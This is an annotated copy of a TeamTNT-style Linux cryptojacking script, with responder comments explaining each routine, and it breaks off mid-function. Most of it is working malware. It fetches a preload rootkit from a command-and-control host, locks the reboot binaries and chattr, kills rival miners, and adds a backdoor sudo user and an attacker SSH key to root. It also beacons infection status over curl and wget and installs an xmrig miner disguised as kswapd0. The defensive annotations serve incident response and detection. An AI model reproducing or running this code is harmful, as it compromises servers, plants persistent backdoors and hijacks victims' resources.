chattr -ia /etc/ld.so.preload|| tntrecht -ia /etc/ld.so.preload
echo -e "/usr/local/lib/pscan.so\n/usr/local/lib/bioset.so\n/usr/local/lib/mscan.so\n/usr/local/lib/kswapd0.so\n/usr/local/lib/zrab.so" >/etc/ld.so.preload
chattr +ia /etc/ld.so.preload|| tntrecht +ia /etc/ld.so.preload
else
echo "hided"
fi
else
grep kswapd0.so /etc/ld.so.preload
if [ $? != 0 ]
then
chattr -ia /etc/ld.so.preload|| tntrecht -ia /etc/ld.so.preload
echo -e "/usr/local/lib/pscan.so\n/usr/local/lib/bioset.so\n/usr/local/lib/mscan.so\n/usr/local/lib/kswapd0.so\n/usr/local/lib/zrab.so" >/etc/ld.so.preload
chattr +ia /etc/ld.so.preload|| tntrecht +ia /etc/ld.so.preload
else
echo "hided"
fi
# hide.jpg is another tar masquerading as an image; the libraries land
# in /usr/local/lib and are locked immutable.
loadthisfile http://oracle.zzhreceive.top/hide/hide.jpg /tmp/hide.tar && tar -xf /tmp/hide.tar -C /usr/local/lib/ && rm -f /tmp/hide.tar
chattr +ia /usr/local/lib/pscan.so || tntrecht +ia /usr/local/lib/pscan.so
chattr +ia /usr/local/lib/mscan.so || tntrecht +ia /usr/local/lib/mscan.so
chattr +ia /usr/local/lib/bioset.so || tntrecht +ia /usr/local/lib/bioset.so
chattr +ia /usr/local/lib/kswapd0.so || tntrecht +ia /usr/local/lib/kswapd0.so
chattr +ia /usr/local/lib/zrab.so || tntrecht +ia /usr/local/lib/zrab.so
fi
}
# Sabotages the administrator's ability to reboot (which would evict the
# in-memory rootkit): locks the shutdown/reboot/poweroff/telinit binaries
# with the immutable flag, attempts the same on /proc/sysrq-trigger (procfs
# does not support file attributes, so this is expected to fail silently),
# and truncates then deletes systemd's reboot target/service units.
# The `2>/dev/null 1>/dev/null` on the assignment line applies to the
# assignment itself, not to `which`, so it is effectively a no-op there.
# Responder note: reinstall the affected packages (systemd, the init
# tools) after clearing the immutable flags; a hard power cycle from the
# hypervisor/cloud console still works.
function LockDownTheSystem(){
LOCKDOWNARRAY=(shutdown reboot poweroff telinit)
for LOCKDOWN in ${LOCKDOWNARRAY[@]}; do
LOCKDOWNBIN=`which $LOCKDOWN` 2>/dev/null 1>/dev/null
chattr -i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
tntrecht -i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
chattr -x $LOCKDOWNBIN 2>/dev/null 1>/dev/null
#chmod 000 $LOCKDOWNBIN 2>/dev/null 1>/dev/null
chattr +i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
tntrecht +i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
done
chattr +i /proc/sysrq-trigger 2>/dev/null 1>/dev/null
tntrecht +i /proc/sysrq-trigger 2>/dev/null 1>/dev/null
LOCKDOWNFILES=("/lib/systemd/system/reboot.target" "/lib/systemd/system/systemd-reboot.service")
for LOCKDOWNFILE in ${LOCKDOWNFILES[@]}; do
chattr -i $LOCKDOWNFILE 2>/dev/null 1>/dev/null
tntrecht -i $LOCKDOWNFILE 2>/dev/null 1>/dev/null
chattr -x $LOCKDOWNFILE 2>/dev/null 1>/dev/null
> $LOCKDOWNFILE
rm -f $LOCKDOWNFILE 2>/dev/null 1>/dev/null
done
}
# Large competitor-eviction routine. Kills known rival miners (xmrig,
# docker-update, redis-backup, MoneroOcean, kinsing/kdevtmpfsi, cpumon,
# /root/.tmp00/bash*) and their docker containers, then replaces several
# rival binaries with a tiny decoy script and locks them immutable so the
# rival cannot reinstall itself. Ends with a blanket kill of any process
# above 40% CPU that is not this family's own miner.
# Key responder facts:
#  - $LOCKFILE decodes to a two-line bash script that only prints
#    "Forbidden action !!! TeamTNT is watching you!" (attribution marker).
#  - /usr/bin/tntrecht is created as a copy of chattr and the real chattr
#    is then made non-executable and immutable — use /usr/bin/tntrecht or
#    reinstall e2fsprogs to regain chattr during cleanup.
#  - $StringToLock is never defined anywhere on this page, so the
#    `echo $StringToLock >` lines write an empty line into the rival paths.
function KILLMININGSERVICES(){
echo "[*] Removing previous miner (if any)"
killall -9 xmrig
echo "do KILLMININGSERVICES"
# Removes containers whose command line matches rival patterns; the outer
# $(...) also executes docker rm's (empty) output as a command, harmlessly.
$(docker rm $(docker ps | grep -v grep | grep "/bin/bash -c 'apt" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
#$(docker rm $(docker ps | grep -v grep | grep "/bin/bash" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "/root/startup.sh" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "widoc26117/xmr" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "zbrtgwlxz" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "tail -f /dev/null" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
rm -f /usr/bin/docker-update 2>/dev/null 1>/dev/null
pkill -f /usr/bin/docker-update 2>/dev/null 1>/dev/null
killall -9 docker-update 2>/dev/null 1>/dev/null
rm -f /usr/bin/redis-backup 2>/dev/null 1>/dev/null
pkill -f /usr/bin/redis-backup 2>/dev/null 1>/dev/null
killall -9 redis-backup 2>/dev/null 1>/dev/null
rm -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null
pkill -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null
rm -fr /tmp/moneroocean/ 2>/dev/null 1>/dev/null
killall -9 xmrig 2>/dev/null 1>/dev/null
# base64 of: #!/bin/bash / echo 'Forbidden action !!! TeamTNT is watching you!'
LOCKFILE='IyEvYmluL2Jhc2gKZWNobyAnRm9yYmlkZGVuIGFjdGlvbiAhISEgVGVhbVROVCBpcyB3YXRjaGluZyB5b3UhJw=='
# Private chattr copy; the original chattr is disabled and locked.
if [ ! -f /usr/bin/tntrecht ]; then
chattrbin=`which chattr`
cp $chattrbin /usr/bin/tntrecht 2>/dev/null 1>/dev/null
chmod +x /usr/bin/tntrecht 2>/dev/null 1>/dev/null
chmod -x $chattrbin 2>/dev/null 1>/dev/null
tntrecht +i $chattrbin 2>/dev/null 1>/dev/null
fi
LOCKFILE='IyEvYmluL2Jhc2gKZWNobyAnRm9yYmlkZGVuIGFjdGlvbiAhISEgVGVhbVROVCBpcyB3YXRjaGluZyB5b3UhJw=='
# Rival xmrig under /root/.tmp: each file is deleted, replaced by the
# decoy script, locked, and its processes killed.
if [ -f /root/.tmp/xmrig ]; then
chattr -iR /root/.tmp/ 2>/dev/null 1>/dev/null
tntrecht -iR /root/.tmp/ 2>/dev/null 1>/dev/null
tmpxmrig=("/root/.tmp/config.json" "/root/.tmp/config_background.json" "/root/.tmp/xmrig.log" "/root/.tmp/miner.sh" "/root/.tmp/xmrig")
for tmpxmrigfile in ${tmpxmrig[@]}; do
rm -f $tmpxmrigfile 2>/dev/null 1>/dev/null
pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null
kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null
echo $LOCKFILE | base64 -d > $tmpxmrigfile
chmod +x $tmpxmrigfile 2>/dev/null 1>/dev/null
chattr +i $tmpxmrigfile 2>/dev/null 1>/dev/null
tntrecht +i $tmpxmrigfile 2>/dev/null 1>/dev/null
pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null
kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null
killall $tmpxmrigfile 2>/dev/null 1>/dev/null
chmod -x /root/.tmp/xmrig 2>/dev/null 1>/dev/null
rm -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null
chattr +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null
tntrecht +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null
pkill -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null
ps ax| grep xmrig 2>/dev/null 1>/dev/null
done
fi
# Rival "cpumon" miner: same delete / decoy / lock / kill sequence.
if [ -f /usr/sbin/cpumon ]; then
cpumonxmr=("/usr/sbin/cpumon" "/usr/cpu")
for cpumonfile in ${cpumonxmr[@]}; do
chattr -i $cpumonfile 2>/dev/null 1>/dev/null
tntrecht -i $cpumonfile 2>/dev/null 1>/dev/null
rm -f $cpumonfile 2>/dev/null 1>/dev/null
pkill -f $cpumonfile 2>/dev/null 1>/dev/null
kill $(pidof $cpumonfile) 2>/dev/null 1>/dev/null
echo $LOCKFILE | base64 -d > $cpumonfile
chmod +x $cpumonfile 2>/dev/null 1>/dev/null
chattr +i $cpumonfile 2>/dev/null 1>/dev/null
tntrecht +i $cpumonfile 2>/dev/null 1>/dev/null
pkill -f $cpumonfile 2>/dev/null 1>/dev/null
kill $(pidof $cpumonfile) 2>/dev/null 1>/dev/null
killall $cpumonfile 2>/dev/null 1>/dev/null
done
fi
if [ -f /opt/server ]; then
chattr -i /opt/server 2>/dev/null 1>/dev/null
tntrecht -i /opt/server 2>/dev/null 1>/dev/null
rm -f /opt/server 2>/dev/null 1>/dev/null
pkill -f /opt/server 2>/dev/null 1>/dev/null
kill $(pidof /opt/server) 2>/dev/null 1>/dev/null
fi
if [ -f /tmp/log_rotari ]; then
chattr -i /tmp/log_rotari 2>/dev/null 1>/dev/null
tntrecht -i /tmp/log_rotari 2>/dev/null 1>/dev/null
rm -f /tmp/log_rotari 2>/dev/null 1>/dev/null
pkill -f /tmp/log_rotari 2>/dev/null 1>/dev/null
kill $(pidof /tmp/log_rotari) 2>/dev/null 1>/dev/null
fi
# Rivals living in /root/.tmp00: their cron entry (/var/spool/cron/root)
# is emptied and deleted too, which also destroys root's legitimate crontab.
BASH00=$(ps ax | grep -v grep | grep "/root/.tmp00/bash")
if [ ! -z "$BASH00" ];
then
chattr -i /var/spool/cron/root 2>/dev/null 1>/dev/null
tntrecht -i /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod 1777 /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod -x /var/spool/cron/root 2>/dev/null 1>/dev/null
echo " " > /var/spool/cron/root 2>/dev/null 1>/dev/null
rm -f /var/spool/cron/root 2>/dev/null 1>/dev/null
chattr -i /root/.tmp00/bash 2>/dev/null 1>/dev/null
tntrecht -i /root/.tmp00/bash 2>/dev/null 1>/dev/null
chmod -x /root/.tmp00/bash 2>/dev/null 1>/dev/null
pkill -f /root/.tmp00/bash 2>/dev/null 1>/dev/null
kill $(ps ax | grep -v grep | grep "/root/.tmp00/bash" | awk '{print $1}') 2>/dev/null 1>/dev/null
kill $(pidof /root/.tmp00/bash) 2>/dev/null 1>/dev/null
echo " " > /root/.tmp00/bash 2>/dev/null 1>/dev/null
rm -f /root/.tmp00/bash 2>/dev/null 1>/dev/null
echo $StringToLock > /root/.tmp00/bash
chattr +i /root/.tmp00/bash 2>/dev/null 1>/dev/null
tntrecht +i /root/.tmp00/bash 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
fi
BASH6400=$(ps ax | grep -v grep | grep "/root/.tmp00/bash64")
if [ ! -z "$BASH6400" ];
then
chattr -i /var/spool/cron/root 2>/dev/null 1>/dev/null
tntrecht -i /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod 1777 /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod -x /var/spool/cron/root 2>/dev/null 1>/dev/null
echo " " > /var/spool/cron/root 2>/dev/null 1>/dev/null
rm -f /var/spool/cron/root 2>/dev/null 1>/dev/null
chattr -i /root/.tmp00/bash64 2>/dev/null 1>/dev/null
tntrecht -i /root/.tmp00/bash64 2>/dev/null 1>/dev/null
chmod -x /root/.tmp00/bash64 2>/dev/null 1>/dev/null
pkill -f /root/.tmp00/bash64 2>/dev/null 1>/dev/null
kill $(ps ax | grep -v grep | grep "/root/.tmp00/bash64" | awk '{print $1}') 2>/dev/null 1>/dev/null
kill $(pidof /root/.tmp00/bash64) 2>/dev/null 1>/dev/null
echo " " > /root/.tmp00/bash64 2>/dev/null 1>/dev/null
rm -f /root/.tmp00/bash64 2>/dev/null 1>/dev/null
echo $StringToLock > /root/.tmp00/bash64
chattr +i /root/.tmp00/bash64 2>/dev/null 1>/dev/null
tntrecht +i /root/.tmp00/bash64 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
fi
# Kinsing family (kinsing / kdevtmpfsi): killed, emptied, locked.
KINSING1=$(ps ax | grep -v grep | grep "/var/tmp/kinsing")
if [ ! -z "$KINSING1" ];
then
chattr -i /var/tmp/kinsing 2>/dev/null 1>/dev/null
tntrecht -i /var/tmp/kinsing 2>/dev/null 1>/dev/null
chmod -x /var/tmp/kinsing 2>/dev/null 1>/dev/null
pkill -f /var/tmp/kinsing 2>/dev/null 1>/dev/null
kill $(ps ax | grep -v grep | grep "/var/tmp/kinsing" | awk '{print $1}') 2>/dev/null 1>/dev/null
kill $(pidof /var/tmp/kinsing) 2>/dev/null 1>/dev/null
echo " " > /var/tmp/kinsing 2>/dev/null 1>/dev/null
rm -f /var/tmp/kinsing 2>/dev/null 1>/dev/null
echo $StringToLock > /var/tmp/kinsing
chattr +i /var/tmp/kinsing 2>/dev/null 1>/dev/null
tntrecht +i /var/tmp/kinsing 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
fi
KINSING2=$(ps ax | grep -v grep | grep "/tmp/kdevtmpfsi")
if [ ! -z "$KINSING2" ];
then
chattr -i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
tntrecht -i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
chmod -x /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
pkill -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
kill $(ps ax | grep -v grep | grep "/tmp/kdevtmpfsi" | awk '{print $1}') 2>/dev/null 1>/dev/null
kill $(pidof /tmp/kdevtmpfsi) 2>/dev/null 1>/dev/null
echo " " > /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
rm -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
echo $StringToLock > /tmp/kdevtmpfsi
chattr +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
tntrecht +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null
history -c 2>/dev/null 1>/dev/null
fi
# Blanket kill of anything above 40% CPU (column 3 of ps aux) unless its
# command line matches the allow-list of this family's own components.
# Like kill_sus_proc, this is what takes down legitimate busy services.
kill $(ps aux | grep -vw kswapd0 | grep -v grep |grep -v scan | grep -vw "/usr/bin/xmrigMiner" | grep -vw "./shell" | awk '{if($3>40.0) print $2}')
}
# SSH/account backdoor (persistence). Creates a local user `hilde`
# (uid/gid 1000, bash shell) with a preset password hash and an
# unrestricted sudoers entry, then installs the operator's public key
# (comment "root@puppetserver") into authorized_keys and authorized_keys2
# for both hilde and root, locking every touched file immutable.
# Because of `||` vs `;` precedence, the `chattr +ia`/`tntrecht +ia` at the
# end of each compound line run unconditionally.
# Responder checklist: grep passwd/shadow/sudoers for "hilde" (note a
# possible uid-1000 collision with the host's first real user), grep all
# authorized_keys* for "root@puppetserver", clear immutable flags first,
# and rotate any credentials that were on the host.
function makesshaxx(){
echo "begin makessh"
RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL root@puppetserver"
grep -q hilde /etc/passwd || chattr -ia /etc/passwd;
grep -q hilde /etc/passwd || tntrecht -ia /etc/passwd;
grep -q hilde /etc/passwd || echo 'hilde:x:1000:1000::/home/hilde:/bin/bash' >> /etc/passwd; chattr +ia /etc/passwd; tntrecht +ia /etc/passwd
grep -q hilde /etc/shadow || chattr -ia /etc/shadow;
grep -q hilde /etc/shadow || tntrecht -ia /etc/shadow;
grep -q hilde /etc/shadow || echo 'hilde:$6$7n/iy4R6znS2iq0J$QjcECLSqMMiUUeHR4iJmkHLzAwgoNRhCC87HI3df95nZH5569TKwJEN2I/lNanPe0vhsdgfILPXedlWlZn7lz0:18461:0:99999:7:::' >> /etc/shadow; chattr +ia /etc/shadow; tntrecht +ia /etc/shadow
grep -q hilde /etc/sudoers || chattr -ia /etc/sudoers;
grep -q hilde /etc/sudoers || tntrecht -ia /etc/sudoers;
grep -q hilde /etc/sudoers || echo 'hilde ALL=(ALL:ALL) ALL' >> /etc/sudoers; chattr +i /etc/sudoers; tntrecht +i /etc/sudoers
# Key installation for the backdoor user (note `>` overwrites here).
mkdir /home/hilde/.ssh/ -p
touch /home/hilde/.ssh/authorized_keys
touch /home/hilde/.ssh/authorized_keys2
chmod 600 /home/hilde/.ssh/authorized_keys
chmod 600 /home/hilde/.ssh/authorized_keys2
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys || chattr -ia /home/hilde/.ssh/authorized_keys;
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys || tntrecht -ia /home/hilde/.ssh/authorized_keys;
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys || echo $RSAKEY > /home/hilde/.ssh/authorized_keys; chattr +ia /home/hilde/.ssh/authorized_keys; tntrecht +ia /home/hilde/.ssh/authorized_keys;
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys2 || chattr -ia /home/hilde/.ssh/authorized_keys2;
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys2 || tntrecht -ia /home/hilde/.ssh/authorized_keys2;
grep -q root@puppetserver /home/hilde/.ssh/authorized_keys2 || echo $RSAKEY > /home/hilde/.ssh/authorized_keys2; chattr +ia /home/hilde/.ssh/authorized_keys2; tntrecht +ia /home/hilde/.ssh/authorized_keys2;
# Same key for root; authorized_keys is appended to (`>>`), so existing
# legitimate root keys are kept alongside the attacker's.
mkdir /root/.ssh/ -p
touch /root/.ssh/authorized_keys
touch /root/.ssh/authorized_keys2
chmod 600 /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys2
grep -q root@puppetserver /root/.ssh/authorized_keys || chattr -ia /root/.ssh/authorized_keys;
grep -q root@puppetserver /root/.ssh/authorized_keys || tntrecht -ia /root/.ssh/authorized_keys;
grep -q root@puppetserver /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys; chattr +ia /root/.ssh/authorized_keys; tntrecht +ia /root/.ssh/authorized_keys
grep -q root@puppetserver /root/.ssh/authorized_keys2 || chattr -ia /root/.ssh/authorized_keys2;
grep -q root@puppetserver /root/.ssh/authorized_keys2 || tntrecht -ia /root/.ssh/authorized_keys2;
grep -q root@puppetserver /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2; chattr +ia /root/.ssh/authorized_keys2; tntrecht +ia /root/.ssh/authorized_keys2
}
# Drops an embedded base64 binary to /usr/bin/pu (payload elided by the
# blog author). As printed, the test is broken: `"/usr/bin/pu"]` is one
# word, so `[` never sees its closing bracket, errors out, and the body is
# skipped — the file would not be created by this copy of the script.
# Still treat an unexpected /usr/bin/pu as an IoC.
function CreateSshPunker(){
if [ ! -f "/usr/bin/pu"]
then
echo 'Iy (此处省略15607个字符...) go=' | base64 -d > /usr/bin/pu; chmod +x /usr/bin/pu
fi
}
# Stage-completion telemetry. Reports back to the operator (over several
# curl/wget variants, including renamed copies) whether the miner log
# exists and whether the backdoor key was successfully installed for
# hilde and for root. Nothing is changed locally.
# Detection: the URL paths kswapd0start / kswapd0notfount / authfailed /
# authok / authfailedroot / authokroot in proxy or DNS/HTTP logs tell a
# responder exactly how far the infection got.
function checksshkeys(){
if [ -f /var/tmp/.copydie/[kswapd0].log ]; then
curl http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0start >>/dev/null
else
curl http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/kswapd0notfount >>/dev/null
fi
# Backdoor key present for the hilde account?
cat /home/hilde/.ssh/authorized_keys|grep root@puppetserver >/dev/null
if (test $? -ne 0); then
curl http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null
else
curl http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null
fi
# Backdoor key present for root?
cat /root/.ssh/authorized_keys|grep root@puppetserver >/dev/null
if (test $? -ne 0); then
curl http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null
else
curl http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
cur http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
cd1 http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
TNTcurl http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
wget -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
wge -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null
fi
}
#######################################
# Miner installer and persistence. As captured it:
#   1. downloads an xmrig build and renames it "$MOHOME/[kswapd0]" (the
#      bracketed name mimics the kernel thread that ps/top normally show);
#   2. fetches a JSON miner config into "$MOHOME/[kswapd0].pid" -- despite
#      the suffix this is the config, not a PID file -- and patches it with
#      sed (pool hosts, coin, thread cap, log file, syslog);
#   3. writes a wrapper "$MOHOME/[kswapd0].sh";
#   4. persists either through /root/.profile (no passwordless sudo) or a
#      systemd unit kswapd0.service (passwordless sudo / root).
# Globals read, all set outside this block: MOHOME, MOxmrigMOD, MOxmrigSTOCK,
#   WALLET, miner_url, config_url, miner_url_backup.
# Defender notes: the unit file captured at the end of this post shows
# $MOHOME resolved to /var/tmp/.copydie. Host artefacts: $MOHOME/[kswapd0],
# [kswapd0].pid, [kswapd0].log, [kswapd0].sh, config_background.json,
# /etc/systemd/system/kswapd0.service, an appended line in /root/.profile
# and a vm.nr_hugepages entry in /etc/sysctl.conf. Network artefacts: the
# pool endpoints written by the sed lines below.
#######################################
function SetupMoneroOcean(){
# Inner helper, defined when the outer function runs and called below:
# download the binary, unpack into $MOHOME, chmod it and smoke-test it with
# --help; on failure fall back to the stock xmrig build in $MOxmrigSTOCK.
function SetupMoneroOcean1(){
# printing intentions
echo "[*] Downloading MoneroOcean advanced version of xmrig to /tmp/xmrig.tar.gz"
if ! curl -L --progress-bar "$MOxmrigMOD" -o /tmp/xmrig.tar.gz; then
echo "ERROR: Can't download $MOxmrigMOD file to /tmp/xmrig.tar.gz"
fi
echo "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"
[ -d $MOHOME/ ] || mkdir $MOHOME/
if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/; then
echo "ERROR: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"
fi
# Brackets are backslash-escaped so the shell does not treat them as a glob.
chmod +x $MOHOME/\[kswapd0\]
rm /tmp/xmrig.tar.gz
echo "[*] Checking if advanced version of $MOHOME/xmrig works fine (and not removed by antivirus software)"
# Smoke test: non-zero exit means the binary is missing or not runnable.
$MOHOME/[kswapd0] --help >/dev/null
if (test $? -ne 0); then
if [ -f $MOHOME/[kswapd0] ]; then
echo "WARNING: Advanced version of $MOHOME/xmrig is not functional"
else
echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"
fi
echo "[*] Looking for the latest version of Monero miner"
# The GitHub "latest release" lookup is disabled; the URL comes from a
# variable set outside this block instead.
#LATEST_XMRIG_RELEASE=`curl -s https://github.com/xmrig/xmrig/releases/latest | grep -o '".*"' | sed 's/"//g'`
LATEST_XMRIG_LINUX_RELEASE=$MOxmrigSTOCK
echo "[*] Downloading $LATEST_XMRIG_LINUX_RELEASE to /tmp/xmrig.tar.gz"
if ! curl -L --progress-bar $LATEST_XMRIG_LINUX_RELEASE -o /tmp/xmrig.tar.gz; then
echo "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz"
fi
echo "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"
# --strip=1 drops the top-level directory of the stock tarball.
if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/ --strip=1; then
echo "WARNING: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"
fi
rm /tmp/xmrig.tar.gz
chmod +x $MOHOME/\[kswapd0\]
echo "[*] Checking if stock version is OKAY!"
$MOHOME/[kswapd0] --help >/dev/null
if (test $? -ne 0); then
if [ -f $MOHOME/[kswapd0] ]; then
echo "ERROR: Stock version of $MOHOME/[kswapd0] is not functional too"
else
echo "ERROR: Stock version of $MOHOME/[kswapd0] was removed by antivirus too"
fi
echo "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz"
fi
fi
echo "[*] $MOHOME/[kswapd0] is OK"
}
######################### printing greetings ###########################
# ANSI-coloured ASCII banner; output only.
clear
echo -e " "
echo -e " \e[1;34;49m___________ _____________________________\033[0m"
echo -e " \e[1;34;49m\__ ___/___ _____ ____\__ ___/\ \__ ___/\033[0m"
echo -e " \e[1;34;49m | |_/ __ \\__ \ / \| | / | \| | \033[0m"
echo -e " \e[1;34;49m | |\ ___/ / __ \| Y Y \ | / | \ | \033[0m"
echo -e " \e[1;34;49m |____| \___ >____ /__|_| /____| \____|__ /____| \033[0m"
echo -e " \e[1;34;49m \/ \/ \/ \/ \033[0m"
echo -e " "
echo -e " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "
echo -e " "
echo -e " \e[1;34;49m Now you get, what i want to give... --- ''' \033[0m"
echo " "
echo " "
# Root check is informational only; both branches continue.
if [ "$(id -u)" == "0" ]; then
echo "running as root... its all OKAY!"
else
echo "running not as root... first starting tmp setup..."
fi
# checking prerequisites
# Every "prerequisite" failure below only prints; nothing aborts the run.
if [ -z $WALLET ]; then
echo "ERROR: wallet"
fi
# Wallet address is "<base>.<worker>"; only the 95-char base is validated.
WALLET_BASE=`echo $WALLET | cut -f1 -d"."`
if [ ${#WALLET_BASE} != 95 ]; then
echo "ERROR: Wrong wallet base address length (should be 95): ${#WALLET_BASE}"
fi
if [ -z $MOHOME ]; then
echo "ERROR: Please define HOME environment variable to your home directory"
fi
if [ ! -d $MOHOME ]; then
echo "ERROR: Please make sure HOME directory $MOHOME exists or set it yourself using this command:"
echo ' export HOME=<dir>'
fi
# Installs curl through whichever package manager exists; all output hidden.
if ! type curl >/dev/null; then
apt-get update --fix-missing 2>/dev/null 1>/dev/null
apt-get install -y curl 2>/dev/null 1>/dev/null
